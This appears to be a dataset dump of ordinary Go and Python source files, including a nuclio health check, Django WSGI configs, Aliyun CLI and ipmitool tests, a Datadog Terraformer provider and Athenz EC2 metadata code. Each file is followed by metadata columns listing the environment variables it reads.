// in case it is not healthy (or container is missing), update function status
// and mark its state to error
for _, function := range functions {
functionConfig := function.GetConfig()
functionState := function.GetStatus().State
functionName := functionConfig.Meta.Name
if functionState != functionconfig.FunctionStateReady {
// Skipping checking of not-ready functions
continue
}
// get function container id
containerID := p.getContainerNameByCreateFunctionOptions(&platform.CreateFunctionOptions{
FunctionConfig: functionconfig.Config{
Meta: functionconfig.Meta{
Name: functionName,
Namespace: namespace,
},
},
})
if err := p.markFunctionUnhealthy(containerID, functionConfig); err != nil {
functionsFailedToMarkUnhealthy = append(functionsFailedToMarkUnhealthy, functionConfig)
} else {
unhealthyFunctions = append(unhealthyFunctions, functionConfig)
}
}
}
if len(unhealthyFunctions) > 0 {
p.Logger.InfoWith(fmt.Sprintf("Successfully marked %d functions as unhealthy",
len(unhealthyFunctions)),
"unhealthyFunctions", unhealthyFunctions)
}
if len(functionsFailedToMarkUnhealthy) > 0 {
p.Logger.WarnWith(fmt.Sprintf("Failed to mark %d functions as unhealthy",
len(functionsFailedToMarkUnhealthy)),
"functionsFailedToMarkUnhealthy", functionsFailedToMarkUnhealthy)
}
}
func (p *Platform) markFunctionUnhealthy(containerID string, functionConfig *functionconfig.Config) error {
if err := p.dockerClient.AwaitContainerHealth(containerID,
&p.functionContainersHealthinessTimeout); err != nil {
// function container is not healthy or missing, mark function state as error
return p.localStore.createOrUpdateFunction(&functionconfig.ConfigWithStatus{
Config: *functionConfig,
Status: functionconfig.Status{
State: functionconfig.FunctionStateError,
Message: "Container is not healthy",
},
})
}
return nil
}
|
[
"\"NUCLIO_TEST_HOST\"",
"\"NUCLIO_TEST_HOST\""
] |
[] |
[
"NUCLIO_TEST_HOST"
] |
[]
|
["NUCLIO_TEST_HOST"]
|
go
| 1 | 0 | |
config/wsgi.py
|
"""
WSGI config for Pathways project.
This module contains the WSGI application used by Django's development server
and any production WSGI deployments. It should expose a module-level variable
named ``application``. Django's ``runserver`` and ``runfcgi`` commands discover
this application via the ``WSGI_APPLICATION`` setting.
Usually you will have the standard Django WSGI application here, but it also
might make sense to replace the whole Django WSGI application with a custom one
that later delegates to the Django one. For example, you could introduce WSGI
middleware here, or combine a Django application with an application of another
framework.
"""
import os
import sys
from django.core.wsgi import get_wsgi_application
# This allows easy placement of apps within the interior
# main directory.
app_path = os.path.dirname(os.path.abspath(__file__)).replace('/config', '')
sys.path.append(os.path.join(app_path, 'main'))
if os.environ.get('DJANGO_SETTINGS_MODULE') == 'config.settings.production':
from raven.contrib.django.raven_compat.middleware.wsgi import Sentry
# We defer to a DJANGO_SETTINGS_MODULE already in the environment. This breaks
# if running multiple sites in the same mod_wsgi process. To fix this, use
# mod_wsgi daemon mode with each site in its own daemon process, or use
# os.environ["DJANGO_SETTINGS_MODULE"] = "config.settings.production"
os.environ.setdefault("DJANGO_SETTINGS_MODULE", "config.settings.production")
# This application object is used by any WSGI server configured to use this
# file. This includes Django's development server, if the WSGI_APPLICATION
# setting points here.
application = get_wsgi_application()
if os.environ.get('DJANGO_SETTINGS_MODULE') == 'config.settings.production':
application = Sentry(application)
# Apply WSGI middleware here.
# from helloworld.wsgi import HelloWorldApplication
# application = HelloWorldApplication(application)
|
[] |
[] |
[
"DJANGO_SETTINGS_MODULE"
] |
[]
|
["DJANGO_SETTINGS_MODULE"]
|
python
| 1 | 0 | |
examples/api_attendance_example.go
|
package main
import (
"fmt"
"github.com/ipandtcp/godingtalk"
"os"
"time"
)
func main() {
c := godingtalk.NewDingTalkClient(os.Getenv("corpid"), os.Getenv("corpsecret"))
err := c.RefreshAccessToken()
if err != nil {
panic(err)
}
dataFrom, _ := time.Parse("2006-01-02", "2018-03-06")
dataTo, _ := time.Parse("2006-01-02", "2018-03-10")
record, err := c.ListAttendanceRecord([]string{"085354234826136236"}, dataFrom, dataTo)
if err != nil {
panic(err)
} else if len(record.Records) > 0 {
fmt.Printf("%#v\n", record.Records[0])
}
result, err := c.ListAttendanceResult([]string{"085354234826136236"}, dataFrom, dataTo, 0, 2)
if err != nil {
panic(err)
} else if len(result.Records) > 0 {
fmt.Printf("%#v\n", result.Records[0])
}
}
|
[
"\"corpid\"",
"\"corpsecret\""
] |
[] |
[
"corpid",
"corpsecret"
] |
[]
|
["corpid", "corpsecret"]
|
go
| 2 | 0 | |
currency/wsgi.py
|
"""
WSGI config for currency project.
It exposes the WSGI callable as a module-level variable named ``application``.
For more information on this file, see
https://docs.djangoproject.com/en/3.2/howto/deployment/wsgi/
"""
import os
from django.core.wsgi import get_wsgi_application
os.environ.setdefault('DJANGO_SETTINGS_MODULE', 'currency.settings')
application = get_wsgi_application()
|
[] |
[] |
[] |
[]
|
[]
|
python
| 0 | 0 | |
config/configuration_test.go
|
// Copyright (c) 2009-present, Alibaba Cloud All rights reserved.
//
// Licensed under the Apache License, Version 2.0 (the "License");
// you may not use this file except in compliance with the License.
// You may obtain a copy of the License at
//
// http://www.apache.org/licenses/LICENSE-2.0
//
// Unless required by applicable law or agreed to in writing, software
// distributed under the License is distributed on an "AS IS" BASIS,
// WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
// See the License for the specific language governing permissions and
// limitations under the License.
package config
import (
"bytes"
"encoding/json"
"errors"
"io"
"os"
"runtime"
"testing"
"github.com/aliyun/aliyun-cli/cli"
"github.com/stretchr/testify/assert"
)
func TestNewConfiguration(t *testing.T) {
excf := Configuration{
CurrentProfile: DefaultConfigProfileName,
Profiles: []Profile{
NewProfile(DefaultConfigProfileName),
},
}
cf := NewConfiguration()
assert.Equal(t, excf, cf)
}
func TestCFNewProfile(t *testing.T) {
cf := Configuration{
CurrentProfile: "",
}
assert.Len(t, cf.Profiles, 0)
p := cf.NewProfile("default")
assert.Len(t, cf.Profiles, 1)
exp := Profile{
Name: "default",
Mode: AK,
OutputFormat: "json",
Language: "en",
}
assert.Equal(t, exp, p)
}
func TestConfiguration(t *testing.T) {
cf := NewConfiguration()
//GetProfile
p, ok := cf.GetProfile("hh")
assert.False(t, ok)
assert.Equal(t, Profile{Name: "hh"}, p)
p, ok = cf.GetProfile("default")
assert.Equal(t, Profile{Name: "default", Mode: AK, OutputFormat: "json", Language: "en"}, p)
//PutProfile
assert.Len(t, cf.Profiles, 1)
cf.PutProfile(Profile{Name: "test", Mode: AK, OutputFormat: "json", Language: "en"})
assert.Len(t, cf.Profiles, 2)
assert.Equal(t, Profile{Name: "test", Mode: AK, OutputFormat: "json", Language: "en"}, cf.Profiles[1])
cf.PutProfile(Profile{Name: "test", Mode: StsToken, OutputFormat: "json", Language: "en"})
assert.Len(t, cf.Profiles, 2)
assert.Equal(t, Profile{Name: "test", Mode: StsToken, OutputFormat: "json", Language: "en"}, cf.Profiles[1])
//GetCurrentProfile
}
func TestLoadProfile(t *testing.T) {
originhook := hookLoadConfiguration
w := new(bytes.Buffer)
defer func() {
hookLoadConfiguration = originhook
}()
hookLoadConfiguration = func(fn func(path string, w io.Writer) (Configuration, error)) func(path string, w io.Writer) (Configuration, error) {
return func(path string, w io.Writer) (Configuration, error) {
return Configuration{CurrentProfile: "default", Profiles: []Profile{Profile{Name: "default", Mode: AK, AccessKeyId: "default_aliyun_access_key_id", AccessKeySecret: "default_aliyun_access_key_secret", OutputFormat: "json"}, Profile{Name: "aaa", Mode: AK, AccessKeyId: "sdf", AccessKeySecret: "ddf", OutputFormat: "json"}}}, nil
}
}
//testcase 1
p, err := LoadProfile(GetConfigPath()+"/"+configFile, w, "")
assert.Nil(t, err)
p.parent = nil
assert.Equal(t, Profile{Name: "default", Mode: AK, AccessKeyId: "default_aliyun_access_key_id", AccessKeySecret: "default_aliyun_access_key_secret", OutputFormat: "json"}, p)
//testcase 2
_, err = LoadProfile(GetConfigPath()+"/"+configFile, w, "hello")
assert.EqualError(t, err, "unknown profile hello, run configure to check")
//LoadCurrentProfile testcase
w.Reset()
p, err = LoadCurrentProfile(w)
assert.Nil(t, err)
p.parent = nil
assert.Equal(t, Profile{Name: "default", Mode: AK, AccessKeyId: "default_aliyun_access_key_id", AccessKeySecret: "default_aliyun_access_key_secret", OutputFormat: "json"}, p)
//testcase 3
hookLoadConfiguration = func(fn func(path string, w io.Writer) (Configuration, error)) func(path string, w io.Writer) (Configuration, error) {
return func(path string, w io.Writer) (Configuration, error) {
return Configuration{}, errors.New("error")
}
}
w.Reset()
p, err = LoadProfile(GetConfigPath()+"/"+configFile, w, "")
assert.Empty(t, p)
assert.EqualError(t, err, "init config failed error")
}
func TestHomePath(t *testing.T) {
if runtime.GOOS == "windows" {
assert.Equal(t, os.Getenv("USERPROFILE"), GetHomePath())
} else {
assert.Equal(t, os.Getenv("HOME"), GetHomePath())
}
}
func TestGetConfigPath(t *testing.T) {
orighookGetHomePath := hookGetHomePath
defer func() {
os.RemoveAll("./.aliyun")
hookGetHomePath = orighookGetHomePath
}()
hookGetHomePath = func(fn func() string) func() string {
return func() string {
return "."
}
}
assert.Equal(t, "./.aliyun", GetConfigPath())
}
func TestNewConfigFromBytes(t *testing.T) {
bytesConf := `{
"current": "",
"profiles": [
{
"name": "default",
"mode": "AK",
"access_key_id": "access_key_id",
"access_key_secret": "access_key_secret",
"sts_token": "",
"ram_role_name": "",
"ram_role_arn": "",
"ram_session_name": "",
"private_key": "",
"key_pair_name": "",
"expired_seconds": 0,
"verified": "",
"region_id": "cn-hangzhou",
"output_format": "json",
"language": "en",
"site": "",
"retry_timeout": 0,
"retry_count": 0
}
],
"meta_path": ""
}`
conf, err := NewConfigFromBytes([]byte(bytesConf))
assert.Nil(t, err)
assert.Equal(t, Configuration{Profiles: []Profile{Profile{Language: "en", Name: "default", Mode: "AK", AccessKeyId: "access_key_id", AccessKeySecret: "access_key_secret", RegionId: "cn-hangzhou", OutputFormat: "json"}}}, conf)
}
func TestSaveConfiguration(t *testing.T) {
orighookGetHomePath := hookGetHomePath
defer func() {
os.RemoveAll("./.aliyun")
hookGetHomePath = orighookGetHomePath
}()
hookGetHomePath = func(fn func() string) func() string {
return func() string {
return "."
}
}
conf := Configuration{Profiles: []Profile{Profile{Language: "en", Name: "default", Mode: "AK", AccessKeyId: "access_key_id", AccessKeySecret: "access_key_secret", RegionId: "cn-hangzhou", OutputFormat: "json"}}}
bytes, err := json.MarshalIndent(conf, "", "\t")
assert.Nil(t, err)
err = SaveConfiguration(conf)
assert.Nil(t, err)
file, err := os.Open(GetConfigPath() + "/" + configFile)
assert.Nil(t, err)
buf := make([]byte, 1024)
n, _ := file.Read(buf)
file.Close()
assert.Equal(t, string(bytes), string(buf[:n]))
}
func TestLoadConfiguration(t *testing.T) {
orighookGetHomePath := hookGetHomePath
defer func() {
os.RemoveAll("./.aliyun")
hookGetHomePath = orighookGetHomePath
}()
hookGetHomePath = func(fn func() string) func() string {
return func() string {
return "."
}
}
w := new(bytes.Buffer)
//testcase 1
cf, err := LoadConfiguration(GetConfigPath()+"/"+configFile, w)
assert.Nil(t, err)
assert.Equal(t, Configuration{CurrentProfile: "default", Profiles: []Profile{Profile{Name: "default", Mode: "AK", OutputFormat: "json", Language: "en"}}}, cf)
conf := Configuration{Profiles: []Profile{Profile{Language: "en", Name: "default", Mode: "AK", AccessKeyId: "access_key_id", AccessKeySecret: "access_key_secret", RegionId: "cn-hangzhou", OutputFormat: "json"}}}
err = SaveConfiguration(conf)
assert.Nil(t, err)
//testcase 2
w.Reset()
cf, err = LoadConfiguration(GetConfigPath()+"/"+configFile, w)
assert.Equal(t, Configuration{CurrentProfile: "", Profiles: []Profile{Profile{Name: "default", Mode: "AK", AccessKeyId: "access_key_id", AccessKeySecret: "access_key_secret", RegionId: "cn-hangzhou", OutputFormat: "json", Language: "en"}}}, cf)
assert.Nil(t, err)
}
func TestLoadProfileWithContext(t *testing.T) {
originhook := hookLoadConfiguration
defer func() {
hookLoadConfiguration = originhook
}()
hookLoadConfiguration = func(fn func(path string, w io.Writer) (Configuration, error)) func(path string, w io.Writer) (Configuration, error) {
return func(path string, w io.Writer) (Configuration, error) {
return Configuration{CurrentProfile: "default", Profiles: []Profile{Profile{Name: "default", Mode: AK, AccessKeyId: "default_aliyun_access_key_id", AccessKeySecret: "default_aliyun_access_key_secret", OutputFormat: "json"}, Profile{Name: "aaa", Mode: AK, AccessKeyId: "sdf", AccessKeySecret: "ddf", OutputFormat: "json"}}}, nil
}
}
w := new(bytes.Buffer)
ctx := cli.NewCommandContext(w)
AddFlags(ctx.Flags())
//testcase 1
_, err := LoadProfileWithContext(ctx)
assert.EqualError(t, err, "region can't be empty")
//testcase 2
ctx.Flags().Get("profile").SetAssigned(true)
_, err = LoadProfileWithContext(ctx)
assert.EqualError(t, err, "region can't be empty")
}
|
[
"\"USERPROFILE\"",
"\"HOME\""
] |
[] |
[
"HOME",
"USERPROFILE"
] |
[]
|
["HOME", "USERPROFILE"]
|
go
| 2 | 0 | |
providers/datadog/datadog_provider.go
|
// Copyright 2018 The Terraformer Authors.
//
// Licensed under the Apache License, Version 2.0 (the "License");
// you may not use this file except in compliance with the License.
// You may obtain a copy of the License at
//
// http://www.apache.org/licenses/LICENSE-2.0
//
// Unless required by applicable law or agreed to in writing, software
// distributed under the License is distributed on an "AS IS" BASIS,
// WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
// See the License for the specific language governing permissions and
// limitations under the License.
package datadog
import (
"context"
"errors"
"fmt"
"net/url"
"os"
"strconv"
datadogV1 "github.com/DataDog/datadog-api-client-go/api/v1/datadog"
datadogV2 "github.com/DataDog/datadog-api-client-go/api/v2/datadog"
"github.com/GoogleCloudPlatform/terraformer/terraformutils"
"github.com/zclconf/go-cty/cty"
)
type DatadogProvider struct { //nolint
terraformutils.Provider
apiKey string
appKey string
apiURL string
validate bool
authV1 context.Context
authV2 context.Context
datadogClientV1 *datadogV1.APIClient
datadogClientV2 *datadogV2.APIClient
}
// Init check env params and initialize API Client
func (p *DatadogProvider) Init(args []string) error {
if args[3] != "" {
validate, validateErr := strconv.ParseBool(args[3])
if validateErr != nil {
return fmt.Errorf(`invalid validate arg : %v`, validateErr)
}
p.validate = validate
} else if os.Getenv("DATADOG_VALIDATE") != "" {
validate, validateErr := strconv.ParseBool(os.Getenv("DATADOG_VALIDATE"))
if validateErr != nil {
return fmt.Errorf(`invalid DATADOG_VALIDATE env var : %v`, validateErr)
}
p.validate = validate
} else {
p.validate = true
}
if args[0] != "" {
p.apiKey = args[0]
} else {
if apiKey := os.Getenv("DATADOG_API_KEY"); apiKey != "" {
p.apiKey = apiKey
} else if p.validate {
return errors.New("api-key requirement")
}
}
if args[1] != "" {
p.appKey = args[1]
} else {
if appKey := os.Getenv("DATADOG_APP_KEY"); appKey != "" {
p.appKey = appKey
} else if p.validate {
return errors.New("app-key requirement")
}
}
if args[2] != "" {
p.apiURL = args[2]
} else if v := os.Getenv("DATADOG_HOST"); v != "" {
p.apiURL = v
}
// Initialize the Datadog V1 API client
authV1 := context.WithValue(
context.Background(),
datadogV1.ContextAPIKeys,
map[string]datadogV1.APIKey{
"apiKeyAuth": {
Key: p.apiKey,
},
"appKeyAuth": {
Key: p.appKey,
},
},
)
if p.apiURL != "" {
parsedAPIURL, parseErr := url.Parse(p.apiURL)
if parseErr != nil {
return fmt.Errorf(`invalid API Url : %v`, parseErr)
}
if parsedAPIURL.Host == "" || parsedAPIURL.Scheme == "" {
return fmt.Errorf(`missing protocol or host : %v`, p.apiURL)
}
// If api url is passed, set and use the api name and protocol on ServerIndex{1}
authV1 = context.WithValue(authV1, datadogV1.ContextServerIndex, 1)
authV1 = context.WithValue(authV1, datadogV1.ContextServerVariables, map[string]string{
"name": parsedAPIURL.Host,
"protocol": parsedAPIURL.Scheme,
})
}
configV1 := datadogV1.NewConfiguration()
datadogClientV1 := datadogV1.NewAPIClient(configV1)
// Initialize the Datadog V2 API client
authV2 := context.WithValue(
context.Background(),
datadogV2.ContextAPIKeys,
map[string]datadogV2.APIKey{
"apiKeyAuth": {
Key: p.apiKey,
},
"appKeyAuth": {
Key: p.appKey,
},
},
)
if p.apiURL != "" {
parsedAPIURL, parseErr := url.Parse(p.apiURL)
if parseErr != nil {
return fmt.Errorf(`invalid API Url : %v`, parseErr)
}
if parsedAPIURL.Host == "" || parsedAPIURL.Scheme == "" {
return fmt.Errorf(`missing protocol or host : %v`, p.apiURL)
}
// If api url is passed, set and use the api name and protocol on ServerIndex{1}
authV2 = context.WithValue(authV2, datadogV2.ContextServerIndex, 1)
authV2 = context.WithValue(authV2, datadogV2.ContextServerVariables, map[string]string{
"name": parsedAPIURL.Host,
"protocol": parsedAPIURL.Scheme,
})
}
configV2 := datadogV2.NewConfiguration()
datadogClientV2 := datadogV2.NewAPIClient(configV2)
p.authV1 = authV1
p.authV2 = authV2
p.datadogClientV1 = datadogClientV1
p.datadogClientV2 = datadogClientV2
return nil
}
// GetName return string of provider name for Datadog
func (p *DatadogProvider) GetName() string {
return "datadog"
}
// GetConfig return map of provider config for Datadog
func (p *DatadogProvider) GetConfig() cty.Value {
return cty.ObjectVal(map[string]cty.Value{
"api_key": cty.StringVal(p.apiKey),
"app_key": cty.StringVal(p.appKey),
"api_url": cty.StringVal(p.apiURL),
"validate": cty.BoolVal(p.validate),
})
}
// InitService ...
func (p *DatadogProvider) InitService(serviceName string, verbose bool) error {
var isSupported bool
if _, isSupported = p.GetSupportedService()[serviceName]; !isSupported {
return errors.New(p.GetName() + ": " + serviceName + " not supported service")
}
p.Service = p.GetSupportedService()[serviceName]
p.Service.SetName(serviceName)
p.Service.SetVerbose(verbose)
p.Service.SetProviderName(p.GetName())
p.Service.SetArgs(map[string]interface{}{
"api-key": p.apiKey,
"app-key": p.appKey,
"api-url": p.apiURL,
"validate": p.validate,
"authV1": p.authV1,
"authV2": p.authV2,
"datadogClientV1": p.datadogClientV1,
"datadogClientV2": p.datadogClientV2,
})
return nil
}
// GetSupportedService return map of support service for Datadog
func (p *DatadogProvider) GetSupportedService() map[string]terraformutils.ServiceGenerator {
return map[string]terraformutils.ServiceGenerator{
"dashboard_list": &DashboardListGenerator{},
"dashboard": &DashboardGenerator{},
"dashboard_json": &DashboardJSONGenerator{},
"downtime": &DowntimeGenerator{},
"logs_archive": &LogsArchiveGenerator{},
"logs_archive_order": &LogsArchiveOrderGenerator{},
"logs_custom_pipeline": &LogsCustomPipelineGenerator{},
"logs_index": &LogsIndexGenerator{},
"logs_index_order": &LogsIndexOrderGenerator{},
"logs_integration_pipeline": &LogsIntegrationPipelineGenerator{},
"logs_pipeline_order": &LogsPipelineOrderGenerator{},
"integration_aws": &IntegrationAWSGenerator{},
"integration_aws_lambda_arn": &IntegrationAWSLambdaARNGenerator{},
"integration_aws_log_collection": &IntegrationAWSLogCollectionGenerator{},
"integration_azure": &IntegrationAzureGenerator{},
"integration_gcp": &IntegrationGCPGenerator{},
"integration_pagerduty": &IntegrationPagerdutyGenerator{},
"integration_pagerduty_service_object": &IntegrationPagerdutyServiceObjectGenerator{},
"integration_slack_channel": &IntegrationSlackChannelGenerator{},
"metric_metadata": &MetricMetadataGenerator{},
"monitor": &MonitorGenerator{},
"security_monitoring_default_rule": &SecurityMonitoringDefaultRuleGenerator{},
"security_monitoring_rule": &SecurityMonitoringRuleGenerator{},
"service_level_objective": &ServiceLevelObjectiveGenerator{},
"synthetics_test": &SyntheticsTestGenerator{},
"synthetics_global_variable": &SyntheticsGlobalVariableGenerator{},
"synthetics_private_location": &SyntheticsPrivateLocationGenerator{},
"user": &UserGenerator{},
"role": &RoleGenerator{},
}
}
// GetResourceConnections return map of resource connections for Datadog
func (p DatadogProvider) GetResourceConnections() map[string]map[string][]string {
return map[string]map[string][]string{
"dashboard": {
"monitor": {
"widget.alert_graph_definition.alert_id", "id",
"widget.group_definition.widget.alert_graph_definition.alert_id", "id",
"widget.alert_value_definition.alert_id", "id",
"widget.group_definition.widget.alert_value_definition.alert_id", "id",
},
"service_level_objective": {
"widget.service_level_objective_definition.slo_id", "id",
"widget.group_definition.widget.service_level_objective_definition.slo_id", "id",
},
},
"dashboard_list": {
"dashboard": {
"dash_item.dash_id", "id",
},
},
"downtime": {
"monitor": {
"monitor_id", "id",
},
},
"integration_aws_lambda_arn": {
"integration_aws": {
"account_id", "account_id",
},
},
"integration_aws_log_collection": {
"integration_aws": {
"account_id", "account_id",
},
},
"logs_archive": {
"integration_aws": {
"s3.account_id", "account_id",
"s3.role_name", "role_name",
"s3_archive.account_id", "account_id",
"s3_archive.role_name", "role_name",
},
"integration_gcp": {
"gcs.project_id", "project_id",
"gcs.client_email", "client_email",
"gcs_archive.project_id", "project_id",
"gcs_archive.client_email", "client_email",
},
"integration_azure": {
"azure.client_id", "client_id",
"azure.tenant_id", "tenant_name",
"azure_archive.client_id", "client_id",
"azure_archive.tenant_id", "tenant_name",
},
},
"logs_archive_order": {
"logs_archive": {
"archive_ids", "id",
},
},
"logs_index_order": {
"logs_index": {
"indexes", "id",
},
},
"logs_pipeline_order": {
"logs_integration_pipeline": {
"pipelines", "id",
},
"logs_custom_pipeline": {
"pipelines", "id",
},
},
"monitor": {
"role": {
"restricted_roles", "id",
},
},
"service_level_objective": {
"monitor": {
"monitor_ids", "id",
},
},
"synthetics_test": {
"synthetics_private_location": {
"locations", "id",
},
},
"synthetics_global_variable": {
"synthetics_test": {
"parse_test_id", "id",
},
},
"user": {
"role": {
"roles", "id",
},
},
}
}
// GetProviderData return map of provider data for Datadog
func (p DatadogProvider) GetProviderData(arg ...string) map[string]interface{} {
return map[string]interface{}{}
}
|
[
"\"DATADOG_VALIDATE\"",
"\"DATADOG_VALIDATE\"",
"\"DATADOG_API_KEY\"",
"\"DATADOG_APP_KEY\"",
"\"DATADOG_HOST\""
] |
[] |
[
"DATADOG_APP_KEY",
"DATADOG_HOST",
"DATADOG_VALIDATE",
"DATADOG_API_KEY"
] |
[]
|
["DATADOG_APP_KEY", "DATADOG_HOST", "DATADOG_VALIDATE", "DATADOG_API_KEY"]
|
go
| 4 | 0 | |
WEB(BE)/api_server/api_server/wsgi.py
|
"""
WSGI config for api_server project.
It exposes the WSGI callable as a module-level variable named ``application``.
For more information on this file, see
https://docs.djangoproject.com/en/3.2/howto/deployment/wsgi/
"""
import os
from django.core.wsgi import get_wsgi_application
os.environ.setdefault('DJANGO_SETTINGS_MODULE', 'api_server.settings')
application = get_wsgi_application()
|
[] |
[] |
[] |
[]
|
[]
|
python
| 0 | 0 | |
providers/ipmitool/ipmitool_test.go
|
package ipmitool
import (
"context"
"errors"
"fmt"
"io/ioutil"
"os"
"os/exec"
"path/filepath"
"reflect"
"testing"
"time"
"bou.ke/monkey"
"github.com/bmc-toolbox/bmclib/internal/ipmi"
"github.com/bmc-toolbox/bmclib/logging"
)
func TestMain(m *testing.M) {
var tempDir string
_, err := exec.LookPath("ipmitool")
if err != nil {
tempDir, err = ioutil.TempDir("/tmp", "")
if err != nil {
os.Exit(2)
}
path := os.Getenv("PATH") + ":" + tempDir
os.Setenv("PATH", path)
fmt.Println(os.Getenv("PATH"))
f := filepath.Join(tempDir, "ipmitool")
err = ioutil.WriteFile(f, []byte{}, 0755)
if err != nil {
os.RemoveAll(tempDir)
os.Exit(3)
}
}
code := m.Run()
os.RemoveAll(tempDir)
os.Exit(code)
}
func TestIsCompatible(t *testing.T) {
testCases := []struct {
name string
ok bool
}{
{"true", true},
{"false", false},
}
for _, tc := range testCases {
tc := tc
t.Run(tc.name, func(t *testing.T) {
var ipm *ipmi.Ipmi
monkey.PatchInstanceMethod(reflect.TypeOf(ipm), "PowerState", func(_ *ipmi.Ipmi, _ context.Context) (status string, err error) {
if !tc.ok {
err = errors.New("not compatible")
}
return "on", err
})
ctx, cancel := context.WithTimeout(context.Background(), 2*time.Second)
defer cancel()
user := "ADMIN"
pass := "ADMIN"
host := "127.1.1.1"
port := "623"
i, _ := ipmi.New(user, pass, host+":"+port)
c := Conn{
Host: host,
Port: port,
User: user,
Pass: pass,
Log: logging.DefaultLogger(),
con: i,
}
ok := c.Compatible(ctx)
if ok != tc.ok {
t.Fatalf("got: %v, expected: %v", ok, tc.ok)
}
})
}
}
func TestPowerState(t *testing.T) {
t.Skip("need real ipmi server")
user := "ADMIN"
pass := "ADMIN"
host := "127.0.0.1"
port := "623"
i, _ := ipmi.New(user, pass, host+":"+port)
c := Conn{
Host: host,
Port: port,
User: user,
Pass: pass,
Log: logging.DefaultLogger(),
con: i,
}
state, err := c.PowerStateGet(context.Background())
if err != nil {
t.Fatal(err)
}
t.Log(state)
t.Fatal()
}
func TestPowerSet1(t *testing.T) {
t.Skip("need real ipmi server")
user := "ADMIN"
pass := "ADMIN"
host := "127.0.0.1"
port := "623"
i, _ := ipmi.New(user, pass, host+":"+port)
c := Conn{
Host: host,
Port: port,
User: user,
Pass: pass,
Log: logging.DefaultLogger(),
con: i,
}
state, err := c.PowerSet(context.Background(), "soft")
if err != nil {
t.Fatal(err)
}
t.Log(state)
t.Fatal()
}
func TestBootDeviceSet2(t *testing.T) {
t.Skip("need real ipmi server")
i := Conn{
Host: "127.0.0.1",
Port: "623",
User: "ADMIN",
Pass: "ADMIN",
Log: logging.DefaultLogger(),
}
state, err := i.BootDeviceSet(context.Background(), "disk", false, false)
if err != nil {
t.Fatal(err)
}
t.Log(state)
t.Fatal()
}
func TestBMCReset(t *testing.T) {
t.Skip("need real ipmi server")
i := Conn{
Host: "127.0.0.1",
Port: "623",
User: "ADMIN",
Pass: "ADMIN",
Log: logging.DefaultLogger(),
}
state, err := i.BmcReset(context.Background(), "warm")
if err != nil {
t.Fatal(err)
}
t.Log(state)
t.Fatal()
}
|
[
"\"PATH\"",
"\"PATH\""
] |
[] |
[
"PATH"
] |
[]
|
["PATH"]
|
go
| 1 | 0 | |
provider/aws/sia-ec2/authn.go
|
//
// Copyright Athenz Authors
//
// Licensed under the Apache License, Version 2.0 (the "License");
// you may not use this file except in compliance with the License.
// You may obtain a copy of the License at
//
// http://www.apache.org/licenses/LICENSE-2.0
//
// Unless required by applicable law or agreed to in writing, software
// distributed under the License is distributed on an "AS IS" BASIS,
// WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
// See the License for the specific language governing permissions and
// limitations under the License.
//
package sia
import (
"encoding/json"
"io"
"io/ioutil"
"os"
"time"
"github.com/AthenZ/athenz/libs/go/sia/aws/meta"
"github.com/AthenZ/athenz/libs/go/sia/aws/options"
"github.com/AthenZ/athenz/libs/go/sia/logutil"
"github.com/AthenZ/athenz/libs/go/sia/util"
)
func getDocValue(docMap map[string]interface{}, key string) string {
value := docMap[key]
if value == nil {
return ""
} else {
return value.(string)
}
}
func GetEC2DocumentDetails(metaEndPoint string) ([]byte, []byte, string, string, string, *time.Time, error) {
document, err := meta.GetData(metaEndPoint, "/latest/dynamic/instance-identity/document")
if err != nil {
return nil, nil, "", "", "", nil, err
}
signature, err := meta.GetData(metaEndPoint, "/latest/dynamic/instance-identity/pkcs7")
if err != nil {
return nil, nil, "", "", "", nil, err
}
var docMap map[string]interface{}
err = json.Unmarshal(document, &docMap)
if err != nil {
return nil, nil, "", "", "", nil, err
}
account := getDocValue(docMap, "accountId")
region := getDocValue(docMap, "region")
instanceId := getDocValue(docMap, "instanceId")
timeCheck, _ := time.Parse(time.RFC3339, getDocValue(docMap, "pendingTime"))
return document, signature, account, instanceId, region, &timeCheck, err
}
func GetECSOnEC2TaskId(sysLogger io.Writer) string {
ecs := os.Getenv("ECS_CONTAINER_METADATA_FILE")
if ecs == "" {
logutil.LogInfo(sysLogger, "Not ECS on EC2 instance\n")
return ""
}
ecsMetaData, err := ioutil.ReadFile(ecs)
if err != nil {
logutil.LogInfo(sysLogger, "Unable to read ECS on EC2 instance metadata: %s - %v\n", ecs, err)
return ""
}
var docMap map[string]interface{}
err = json.Unmarshal(ecsMetaData, &docMap)
if err != nil {
logutil.LogInfo(sysLogger, "Unable to parse ECS on EC2 instance metadata: %s - %v\n", ecs, err)
return ""
}
taskArn := getDocValue(docMap, "TaskARN")
_, taskId, _, err := util.ParseTaskArn(taskArn)
if err != nil {
logutil.LogInfo(sysLogger, "Unable to parse ECS on EC2 task id: %s - %v\n", taskArn, err)
return ""
}
return taskId
}
func GetEC2Config(configFile, metaEndpoint string, useRegionalSTS bool, region, account string, sysLogger io.Writer) (*options.Config, *options.ConfigAccount, error) {
config, configAccount, err := options.InitFileConfig(configFile, metaEndpoint, useRegionalSTS, region, account, sysLogger)
if err != nil {
logutil.LogInfo(sysLogger, "Unable to process configuration file '%s': %v\n", configFile, err)
logutil.LogInfo(sysLogger, "Trying to determine service details from the environment variables...\n")
config, configAccount, err = options.InitEnvConfig(config)
if err != nil {
logutil.LogInfo(sysLogger, "Unable to process environment settings: %v\n", err)
// if we do not have settings in our environment, we're going
// to use fallback to <domain>.<service>-service naming structure
logutil.LogInfo(sysLogger, "Trying to determine service name security credentials...\n")
configAccount, err = options.InitCredsConfig("-service", useRegionalSTS, region, sysLogger)
if err != nil {
logutil.LogInfo(sysLogger, "Unable to process security credentials: %v\n", err)
logutil.LogInfo(sysLogger, "Trying to determine service name from profile arn...\n")
configAccount, err = options.InitProfileConfig(metaEndpoint, "-service")
if err != nil {
logutil.LogInfo(sysLogger, "Unable to determine service name: %v\n", err)
return config, nil, err
}
}
}
}
return config, configAccount, nil
}
|
[
"\"ECS_CONTAINER_METADATA_FILE\""
] |
[] |
[
"ECS_CONTAINER_METADATA_FILE"
] |
[]
|
["ECS_CONTAINER_METADATA_FILE"]
|
go
| 1 | 0 | |
scripts/gen_vimdoc.py
|
#!/usr/bin/env python3
"""Generates Nvim :help docs from C/Lua docstrings, using Doxygen.
Also generates *.mpack files. To inspect the *.mpack structure:
:new | put=v:lua.vim.inspect(msgpackparse(readfile('runtime/doc/api.mpack')))
Flow:
main
extract_from_xml
fmt_node_as_vimhelp \
